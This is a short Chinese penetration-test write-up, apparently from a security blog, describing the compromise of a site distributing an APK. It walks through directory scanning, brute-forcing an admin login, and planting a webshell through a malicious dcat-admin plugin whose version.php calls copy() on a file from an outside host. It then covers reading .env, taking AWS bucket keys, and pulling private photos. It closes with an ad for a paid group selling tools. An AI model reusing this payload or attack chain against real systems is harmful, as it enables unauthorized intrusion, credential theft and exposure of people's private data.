网站打开后是一个apk，通过抓包分析出网址。

通过js查找有用线索：

view-source:http://x.x.x.x/static/js/index.js

http://x.x.x.x:9601 为api接收服务器

通过扫描目录得到后台地址http://x.x.x.x:9601/admin/auth/

通过爆破得到账号密码，图片上传是上传到oss空间的，无法通过这个方法getshell

只能通过插件方式上传,这套后台模版是dcat-admin

先去应用市场去选择一个插件安装包，然后修改安装包里面的php文件。修改上面插件中的version.php改为以下代码

<?phpreturn [    '1.0.0'.copy('https://xxx.xxx.xxx.xxx/txt/a3f9zp','123.php') => [        'Initialize extension.',    ],];

选择本地安装，在网站根目录得到webshell。

配置文件在.env中

得到亚马逊的存储桶的密钥

连接亚马逊的存储桶下得到一些私人照片

得到一张人脸照片。

保存所有关键数据移交jc叔叔

        这次测试还是学会了许多东西，GetShell主要通过了插件板块->本地安装->恶意zip->最终getshell。喜欢的师傅可以点赞转发支持一下谢谢！

       加入内部星球可获得内部工具和享受内部资源，包含文章中的小程序一键反编译工具。详情直接点击下方链接进入了解，需要加入的直接点击下方链接了解即可，觉得价格高的师傅可后台回复" 星球 "有优惠券名额有限先到先得！后续增加ChatGPT4共享账号现在加入还是低价！

👉点击了解-->>内部VIP知识星球福利介绍V1.3版本-星球介绍